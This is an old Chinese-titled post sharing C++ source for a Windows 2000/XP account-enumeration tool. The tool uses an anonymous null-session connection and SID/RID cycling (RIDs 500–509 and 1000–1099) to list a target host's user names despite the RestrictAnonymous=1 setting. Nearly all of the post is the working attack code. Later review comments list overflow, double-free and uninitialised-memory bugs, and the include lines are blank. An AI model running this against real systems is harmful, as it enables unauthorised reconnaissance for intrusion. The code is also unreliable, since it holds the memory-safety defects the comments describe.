
突破“RestrictAnonymous=1”限制枚举帐号的代码

04-10-16


 ////////////////////////////////////////////////////////////////////////////////
//
// Enum users
//
// File : Enum.cpp
// Comment : For win2k and XP(proserveradv)
//
//
// Created by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////


#include
#include
#include
#include

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Netapi32.lib")
#pragma comment (lib, "Mpr.lib")

void MyPrintSidInfo(PSID, PSID_NAME_USE);
int MyConnectServer(LPNETRESOURCE, LPCTSTR, LPCTSTR, DWORD, LPTSTR);
int MyDisConnectServer(LPCTSTR, DWORD, BOOL);

// Entry point. argv[1] is the UNC path used for the anonymous ("" / "") connection and,
// unchanged, as the server name for the Lookup* calls. The SID of "guest" is resolved,
// its sub-authorities copied, and sub-authority[4] is then replaced by 500..509 and
// 1000..1099 so the server can be asked to name each resulting SID.
// Always returns 0; every failure is reported on stdout only.
//
// NOTE(review): defects visible in this block, marked where they occur:
//   - argv[1] is copied with unbounded sprintf() into 50- and 30-byte buffers before
//     argc is checked;
//   - nSize is passed as both the SID-size and domain-name-length argument, so one call
//     writes both required sizes back through the same variable;
//   - dwSubAuthority[5..7] are read even when the SID has fewer sub-authorities;
//   - pNewSid is freed at the top of the second loop and again at End:, and is passed
//     to FreeSid at End: on paths where it was never allocated; pSid comes from
//     LocalAlloc but is released with FreeSid; lpUserName is never released.
int main (int argc, char* argv[])
{
int nRetCode, nSubAuthorityCount, i;
DWORD nSize;
int dwSubAuthority[8];   // only the first nSubAuthorityCount entries are filled below
char szIpc[50] = "";
char szServer[30] = "";  // written once below, never read afterwards
PSID pSid;
PSID pNewSid;            // not initialised; see FreeSid calls at the second loop and at End:
LPTSTR lpDomainName;
LPTSTR lpUserName;
PSID_NAME_USE peUse;
PSID_IDENTIFIER_AUTHORITY pSIA;

nSize = 1024;

// All four buffers are 1024 bytes; peUse only needs sizeof(SID_NAME_USE).
pSid = (PSID) LocalAlloc(LPTR, 1024);
lpDomainName = (LPTSTR) LocalAlloc(LPTR, 1024);
peUse = (PSID_NAME_USE) LocalAlloc(LPTR, 1024);
lpUserName = (LPTSTR) LocalAlloc(LPTR, 1024);

// NOTE(review): unbounded copies of argv[1] (50- and 30-byte targets), and argv[1] is
// dereferenced before the argc check below.
sprintf (szIpc, "%s", argv[1]);
sprintf (szServer, "%s", argv[1]);
NETRESOURCE NET;

if (argc<2)
return 0;

// Anonymous (null-credential) connection to the path given on the command line.
NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;

printf ("Connecting %s...", szIpc);
nRetCode = MyConnectServer(&NET, "", "", 0, szIpc);
if (nRetCode)
{
printf ("Failed! ");
return 0;
}
else
{
printf ("Successfully! ");
}

// NOTE(review): &nSize is used for both cbSid and cchReferencedDomainName; the call
// updates both through the same variable.
if (!LookupAccountName(argv[1], "guest", pSid, &nSize, lpDomainName, &nSize, peUse))
{
printf ("Lookup failed!%d ", GetLastError());
goto End;   // pNewSid is still uninitialised when End: frees it
}

printf ("DomainName:%s ", lpDomainName);
pSIA = GetSidIdentifierAuthority(pSid);
MyPrintSidInfo(pSid, peUse);
nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
for (i = 0; i< nSubAuthorityCount; i++)
{
dwSubAuthority[i] = (int) *GetSidSubAuthority(pSid, i);
}

//lookup system account
// Sub-authority[4] is replaced by 500 + i; entries 5..7 are passed regardless of
// nSubAuthorityCount and are uninitialised when the SID has fewer than 8 sub-authorities.
for (i = 0; i < 10; i++)
{
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(500 + i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d ",GetLastError());
goto End;
}
// Same &nSize-for-both-lengths pattern as the LookupAccountName call above.
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
printf ("Lookup error!%d ", GetLastError());
break;   // pNewSid is left allocated; the next loop's FreeSid releases it
}
else
{
printf ("UserName: %s ", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
FreeSid(pNewSid);   // when the loop runs to completion pNewSid is now stale
}

//look up user account
for (i = 0; i < 100; i++)
{
// NOTE(review): on the first iteration this frees the SID already released at the end
// of the previous loop (double free) unless that loop exited via break.
FreeSid(pNewSid);
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(1000 + i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d ",GetLastError());
goto End;
}
// Lookup failures are silently skipped here (unlike the 500.. loop, which breaks).
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
}
else
{
printf ("UserName: %s ", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
}

End:

// NOTE(review): pNewSid may be uninitialised or already freed on some paths reaching
// here; pSid was obtained from LocalAlloc, not AllocateAndInitializeSid; lpUserName is
// never freed.
FreeSid(pNewSid);
FreeSid(pSid);
LocalFree(lpDomainName);
LocalFree(peUse);
Sleep (100);   // purpose not stated in the original; presumably lets the last lookup settle — confirm
printf ("Disconnecting server...");
// The value printed on failure is the earlier connect result, not the disconnect result.
if (MyDisConnectServer(szIpc, CONNECT_UPDATE_PROFILE, TRUE))
printf ("Failed!%d ", nRetCode);
else
printf ("Successfully! ");
return 0;
}

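/**
 * Print a SID in S-1-<authority>-<sub-authority>... form, followed by its
 * sub-authority count and the account type reported by LookupAccountName /
 * LookupAccountSid. Output goes to stdout; nothing is returned.
 *
 * Fixes relative to the earlier version: format specifiers now match the
 * unsigned DWORD/ULONG arguments, the authority bytes are widened before
 * shifting (BYTE << 24 promoted to int and could overflow), a wide
 * identifier authority is printed in the documented S-1-0x<hex> form, and
 * the switch has a default for values this table does not name.
 *
 * @param pSid   SID to render; the function returns at once if NULL.
 * @param peUse  Account type written by the Lookup* call; returns at once if NULL.
 */
void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse)
{
    if (pSid == NULL || peUse == NULL)
        return;

    PSID_IDENTIFIER_AUTHORITY pSIA = GetSidIdentifierAuthority(pSid);

    printf (" SID:");
    if (pSIA->Value[0] == 0 && pSIA->Value[1] == 0)
    {
        // Authority fits in 32 bits: assemble bytes 2..5 (big-endian).
        ULONG ulSIA = (ULONG)pSIA->Value[5]
                    | ((ULONG)pSIA->Value[4] << 8)
                    | ((ULONG)pSIA->Value[3] << 16)
                    | ((ULONG)pSIA->Value[2] << 24);
        printf ("S-1-%lu", ulSIA);
    }
    else
    {
        // Authority wider than 32 bits: string form is S-1-0x followed by
        // the six authority bytes as zero-padded hex.
        printf ("S-1-0x");
        for (int b = 0; b < 6; b++)
            printf ("%02x", (unsigned)pSIA->Value[b]);
    }

    int nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
    for (int i = 0; i < nSubAuthorityCount; i++)
    {
        // Sub-authorities are DWORDs; print them unsigned.
        printf ("-%lu", (unsigned long)*GetSidSubAuthority(pSid, i));
    }

    printf (" SubAuthorityCount:%d ", nSubAuthorityCount);
    printf (" AccountType:");
    switch (*peUse)
    {
    case SidTypeUser:
        printf ("User");
        break;
    case SidTypeGroup:
        printf ("Group account");
        break;
    case SidTypeDomain:
        printf ("Domain account");
        break;
    case SidTypeAlias:
        printf ("Alias account");
        break;
    case SidTypeWellKnownGroup:
        printf ("Well-known group");
        break;
    case SidTypeDeletedAccount:
        printf ("Deleted account");
        break;
    case SidTypeInvalid:
        printf ("Invalid account");
        break;
    case SidTypeUnknown:
        printf ("Unknown account");
        break;
    case SidTypeComputer:
        printf ("Computer account");
        break;
    default:
        // Newer SDKs define further SID_NAME_USE values (e.g. SidTypeLabel).
        printf ("Unknown type (%d)", (int)*peUse);
        break;
    }
    printf (" ");
}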

// Drop any existing connection to lpRemoteName, then connect with the given
// credentials. Returns 0 on success; on failure returns the thread's last-error
// value as read after WNetAddConnection2 failed (every failure class is reported
// the same way).
//
// NOTE(review): the WNetAddConnection2 return value itself is not returned to the
// caller, only GetLastError(); whether the two always agree is not established here.
int MyConnectServer(LPNETRESOURCE lpNetResource,
LPCTSTR lpPassword,
LPCTSTR lpUserName,
DWORD dwFlags,
LPTSTR lpRemoteName)
{
    // The cancel result is discarded: no prior connection is a normal case.
    (void) WNetCancelConnection2(lpRemoteName, dwFlags, TRUE);

    int nStatus = WNetAddConnection2(lpNetResource, lpPassword, lpUserName, dwFlags);
    if (nStatus == NO_ERROR)
        return 0;

    // ERROR_ALREADY_ASSIGNED, ERROR_DEVICE_ALREADY_REMEMBERED, ERROR_ACCESS_DENIED,
    // ERROR_BAD_NET_NAME and anything else all map to the same report.
    return (int) GetLastError();
}

// Cancel the connection named lpName. Returns 0 on success, otherwise the
// thread's last-error value observed after WNetCancelConnection2 failed.
int MyDisConnectServer(LPCTSTR lpName,
DWORD dwFlag,
BOOL bForce)
{
    int nStatus = WNetCancelConnection2(lpName, dwFlag, bForce);
    return (nStatus == NO_ERROR) ? 0 : (int) GetLastError();
}

